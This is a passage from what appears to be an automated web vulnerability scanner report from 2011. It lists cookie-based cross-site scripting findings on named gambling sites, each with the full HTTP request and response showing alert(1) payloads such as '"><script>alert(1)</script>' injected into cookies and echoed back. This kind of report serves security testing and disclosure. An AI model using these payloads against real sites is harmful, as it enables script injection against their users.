<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=130137e3da0';alert(1)//5a270d6e34e&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.144. http://primescratchcards.com/images/underage.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/underage.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85468"%3balert(1)//e0168fa7962 was submitted in the ARC cookie. This input was echoed as 85468";alert(1)//e0168fa7962 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/underage.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013785468"%3balert(1)//e0168fa7962; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:30 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=13013785468%22%3Balert%281%29%2F%2Fe0168fa7962; expires=Tue, 15-May-2012 12:38:30 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=13013785468";alert(1)//e0168fa7962' border='0' width='1' height='1'>
...[SNIP]...

3.145. http://scratch.co.uk/ [affiliate cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36051"><script>alert(1)</script>f6746a21160 was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?currency=USD HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C24336051"><script>alert(1)</script>f6746a21160; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C24336051%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ef6746a21160; expires=Wed, 15-Jun-2011 12:25:50 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:50 GMT; path=/
Set-Cookie: currency=USD; expires=Wed, 15-Jun-2011 12:25:50 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:50 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('USD', 'ENG', 'direct-173|193|214|24336051"><script>alert(1)</script>f6746a21160');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.146. http://scratch.co.uk/ [affiliate cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /

Issue detail

The value of the affiliate cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 485c6"%3balert(1)//e22d61d7a59 was submitted in the affiliate cookie. This input was echoed as 485c6";alert(1)//e22d61d7a59 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?currency=USD HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243485c6"%3balert(1)//e22d61d7a59; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243485c6%22%3Balert%281%29%2F%2Fe22d61d7a59; expires=Wed, 15-Jun-2011 12:25:51 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:51 GMT; path=/
Set-Cookie: currency=USD; expires=Wed, 15-Jun-2011 12:25:51 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:51 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
xt/javascript">
$(document).ready(function() {
flashembed("middleflash", {src: "/images/scratch3a.swf?clickTag=javascript:openScratch('USD', 'ENG', 'direct-173|193|214|243485c6";alert(1)//e22d61d7a59');", w3c: true, wmode: "transparent"}, {
monthlyprizetext: 'Won Last Month',
               monthlyprize: '$53,521,715',
               topprizetext: 'Scratch $2 to Win',
               topprizes: '$1,000,000',
               
...[SNIP]...

3.147. http://scratch.co.uk/ [currency cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dce5d"><script>alert(1)</script>16e5937d22d was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: scratch.co.uk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/?currency=USD737fc%22%3balert(1)//814391c7445
Cookie: affiliate=direct-173%7C193%7C214%7C243; lang=ENG; currency=dce5d"><script>alert(1)</script>16e5937d22d; neogamesemail=deleted%7E%7E; __utma=170832034.749346019.1305550695.1305550695.1305550695.1; __utmb=170832034.8.8.1305550735270; __utmc=170832034; __utmz=170832034.1305550695.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; PHPSESSID=eiture7mb7g66oo3tttam6nfm5

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:59:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:59:19 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:59:19 GMT; path=/
Set-Cookie: currency=dce5d%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E16e5937d22d; expires=Wed, 15-Jun-2011 12:59:19 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:59:19 GMT; path=/
Content-Type: text/html
Content-Length: 11363

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('dce5d"><script>alert(1)</script>16e5937d22d', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.148. http://scratch.co.uk/ [currency cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /

Issue detail

The value of the currency cookie is copied into the name of an HTML tag attribute. The payload 58c29><script>alert(1)</script>cfec32cd964 was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: scratch.co.uk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/?currency=USD737fc%22%3balert(1)//814391c7445
Cookie: affiliate=direct-173%7C193%7C214%7C243; lang=ENG; currency=USD737fc%22%3Balert%281%29%2F%2F814391c744558c29><script>alert(1)</script>cfec32cd964; neogamesemail=deleted%7E%7E; __utma=170832034.749346019.1305550695.1305550695.1305550695.1; __utmb=170832034.8.8.1305550735270; __utmc=170832034; __utmz=170832034.1305550695.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; PHPSESSID=eiture7mb7g66oo3tttam6nfm5

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:59:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:59:18 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:59:18 GMT; path=/
Set-Cookie: currency=USD737fc%22%3Balert%281%29%2F%2F814391c744558c29%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ecfec32cd964; expires=Wed, 15-Jun-2011 12:59:18 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:59:18 GMT; path=/
Content-Type: text/html
Content-Length: 11427

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('USD737fc";alert(1)//814391c744558c29><script>alert(1)</script>cfec32cd964', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.149. http://scratch.co.uk/ [currency cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /

Issue detail

The value of the currency cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21696"%3balert(1)//58111e9164 was submitted in the currency cookie. This input was echoed as 21696";alert(1)//58111e9164 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: scratch.co.uk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/?currency=USD737fc%22%3balert(1)//814391c7445
Cookie: affiliate=direct-173%7C193%7C214%7C243; lang=ENG; currency=21696"%3balert(1)//58111e9164; neogamesemail=deleted%7E%7E; __utma=170832034.749346019.1305550695.1305550695.1305550695.1; __utmb=170832034.8.8.1305550735270; __utmc=170832034; __utmz=170832034.1305550695.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; PHPSESSID=eiture7mb7g66oo3tttam6nfm5

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:59:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:59:19 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:59:19 GMT; path=/
Set-Cookie: currency=21696%22%3Balert%281%29%2F%2F58111e9164; expires=Wed, 15-Jun-2011 12:59:19 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:59:19 GMT; path=/
Content-Type: text/html
Content-Length: 11229

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<script type="text/javascript">
$(document).ready(function() {
flashembed("middleflash", {src: "/images/scratch3a.swf?clickTag=javascript:openScratch('21696";alert(1)//58111e9164', 'ENG', 'direct-173|193|214|243');", w3c: true, wmode: "transparent"}, {
monthlyprizetext: 'Won Last Month',
               monthlyprize: '53,521,715',
               topprizetext: 'Scratch 2 to Win',
       
...[SNIP]...

3.150. http://scratch.co.uk/ [currency cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /

Issue detail

The value of the currency cookie is copied into a JavaScript rest-of-line comment. The payload 161fb%0aalert(1)//2182f944140 was submitted in the currency cookie. This input was echoed as 161fb
alert(1)//2182f944140
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: scratch.co.uk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/?currency=USD737fc%22%3balert(1)//814391c7445
Cookie: affiliate=direct-173%7C193%7C214%7C243; lang=ENG; currency=USD737fc%22%3Balert%281%29%2F%2F814391c7445161fb%0aalert(1)//2182f944140; neogamesemail=deleted%7E%7E; __utma=170832034.749346019.1305550695.1305550695.1305550695.1; __utmb=170832034.8.8.1305550735270; __utmc=170832034; __utmz=170832034.1305550695.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; PHPSESSID=eiture7mb7g66oo3tttam6nfm5

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:59:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:59:20 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:59:20 GMT; path=/
Set-Cookie: currency=USD737fc%22%3Balert%281%29%2F%2F814391c7445161fb%0Aalert%281%29%2F%2F2182f944140; expires=Wed, 15-Jun-2011 12:59:20 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:59:20 GMT; path=/
Content-Type: text/html
Content-Length: 11477

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
e="text/javascript">
$(document).ready(function() {
flashembed("middleflash", {src: "/images/scratch3a.swf?clickTag=javascript:openScratch('USD737fc";alert(1)//814391c7445161fb
alert(1)//2182f944140
', 'ENG', 'direct-173|193|214|243');", w3c: true, wmode: "transparent"}, {
monthlyprizetext: 'Won Last Month',
               monthlyprize: '53,521,715',
               topprizetext: 'Scratch 2 to Win',
       
...[SNIP]...

3.151. http://scratch.co.uk/ [lang cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /

Issue detail

The value of the lang cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74696"%3balert(1)//2bb8cf6f796 was submitted in the lang cookie. This input was echoed as 74696";alert(1)//2bb8cf6f796 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?currency=USD HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG74696"%3balert(1)//2bb8cf6f796; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:29:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:13 GMT; path=/
Set-Cookie: lang=ENG74696%22%3Balert%281%29%2F%2F2bb8cf6f796; expires=Wed, 15-Jun-2011 12:29:13 GMT; path=/
Set-Cookie: currency=USD; expires=Wed, 15-Jun-2011 12:29:13 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:13 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<script type="text/javascript">
$(document).ready(function() {
flashembed("middleflash", {src: "/images/scratch3a.swf?clickTag=javascript:openScratch('USD', 'ENG74696";alert(1)//2bb8cf6f796', 'direct-173|193|214|243');", w3c: true, wmode: "transparent"}, {
monthlyprizetext: 'Won Last Month',
               monthlyprize: '$53,521,715',
               topprizetext: 'Scratch $2 to Win',
               top
...[SNIP]...

3.152. http://scratch.co.uk/ [lang cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /

Issue detail

The value of the lang cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2298d"><script>alert(1)</script>bfab089b01f was submitted in the lang cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?currency=USD HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG2298d"><script>alert(1)</script>bfab089b01f; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:29:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:11 GMT; path=/
Set-Cookie: lang=ENG2298d%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ebfab089b01f; expires=Wed, 15-Jun-2011 12:29:11 GMT; path=/
Set-Cookie: currency=USD; expires=Wed, 15-Jun-2011 12:29:11 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:11 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('USD', 'ENG2298d"><script>alert(1)</script>bfab089b01f', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.153. http://scratch.co.uk/ [neogamesemail cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /

Issue detail

The value of the neogamesemail cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af05e"><script>alert(1)</script>d33344ce0f7 was submitted in the neogamesemail cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?currency=USD HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deletedaf05e"><script>alert(1)</script>d33344ce0f7; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:27:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:27:03 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:27:03 GMT; path=/
Set-Cookie: currency=USD; expires=Wed, 15-Jun-2011 12:27:03 GMT; path=/
Set-Cookie: neogamesemail=deletedaf05e%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed33344ce0f7%7E%7E; expires=Tue, 17-May-2011 00:27:03 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14257

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="http://www.hopa.com/visit.aspx?csi=10&amp;CorID=deletedaf05e"><script>alert(1)</script>d33344ce0f7&amp;SentDate=&amp;CorExpTime=&amp;" class="iframe" >
...[SNIP]...

3.154. http://scratch.co.uk/about/ [affiliate cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /about/

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c841f"><script>alert(1)</script>c26133aa53 was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /about/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
